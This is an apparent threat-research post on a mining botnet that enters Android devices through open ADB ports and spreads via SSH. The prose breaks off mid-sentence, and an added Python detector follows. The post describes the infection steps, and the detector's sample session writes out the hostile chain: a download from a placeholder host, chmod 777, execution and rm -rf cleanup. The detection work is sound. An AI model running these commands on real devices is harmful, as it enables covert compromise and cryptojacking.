Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH

by Jindrich Karasek


We observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread via SSH. This attack takes advantage of the way open ADB ports don’t have authentication by default, similar to the Satori botnet variant we previously reported. This botnet’s design allows it to spread from the infected host to any system that has had a previous SSH connection with the host.


The use of ADB makes Android-based devices susceptible to the malware. We detected activity from this botnet in 21 different countries, with the highest percentage found in South Korea.


Technical details

ADB Arrival

We found that the IP address 45[.]67[.]14[.]179 connects to the ADB-running device or system and then conducts several activities. Figure 1 summarizes the attack’s infection chain.



Figure 1. Infection chain of the attack



The attack starts by using the ADB command shell to change the attacked system’s working directory to “/data/local/tmp”. This location is chosen because .tmp files typically have execute permission by default.


The bot then determines the kind of system it has entered and whether or not the system is a honeypot, as indicated by the command “uname -a”.


It then uses wget to download the payload, falling back to curl if wget is not present on the infected system. The bot then issues the command “chmod 777 a.sh” to change the permission settings of the downloaded payload, allowing it to be executed.


Finally, once “a.sh” has been executed, it is deleted with the command “rm -rf a.sh*” to remove its traces. All these commands can be seen in the ma ..
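As a defender-side illustration, added here and not part of the original post, the following Python matcher checks an ADB session transcript (as an ADB honeypot or device audit log would record it) against the command chain described above: cd to /data/local/tmp, uname -a, wget/curl of a.sh, chmod 777, execution, and rm -rf a.sh*. The session lines and the payload host are constructed placeholders, not values from the post.

```python
import re

# Stages of the ADB infection chain described in the post, as regexes over
# the command text. The payload server is not assumed; any wget/curl of a.sh
# counts as the download stage.
STAGES = [
    ("cd_tmp",   re.compile(r"\bcd\s+/data/local/tmp\b")),
    ("recon",    re.compile(r"\buname\s+-a\b")),
    ("download", re.compile(r"\b(wget|curl)\b.*\ba\.sh\b")),
    ("chmod",    re.compile(r"\bchmod\s+777\s+a\.sh\b")),
    ("execute",  re.compile(r"(^|[;&|]\s*|\s)(sh|\./)\s*a\.sh\b")),
    ("cleanup",  re.compile(r"\brm\s+-rf\s+a\.sh\*")),
]


def match_stages(commands):
    """Return the ordered list of stage names seen across the command lines."""
    seen = []
    for cmd in commands:
        for name, pattern in STAGES:
            if name not in seen and pattern.search(cmd):
                seen.append(name)
    return seen


def classify(commands, min_stages=3):
    """Verdict for one ADB session: 'botnet_chain' once enough stages appear.

    Partial chains (e.g. the shell was cut off before cleanup) still trigger
    when at least min_stages of the six stages are present.
    """
    seen = match_stages(commands)
    verdict = "botnet_chain" if len(seen) >= min_stages else "benign"
    return verdict, seen


# Constructed sample session (placeholder host, not from the post).
SAMPLE_SESSION = [
    "cd /data/local/tmp",
    "uname -a",
    "wget http://PAYLOAD-HOST.example/a.sh || curl -O http://PAYLOAD-HOST.example/a.sh",
    "chmod 777 a.sh",
    "sh a.sh",
    "rm -rf a.sh*",
]

# Constructed benign developer session for contrast.
DEV_SESSION = ["cd /sdcard", "ls -l", "uname -a"]

if __name__ == "__main__":
    print(classify(SAMPLE_SESSION))  # ('botnet_chain', all six stage names)
    print(classify(DEV_SESSION))     # ('benign', ['recon'])
```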
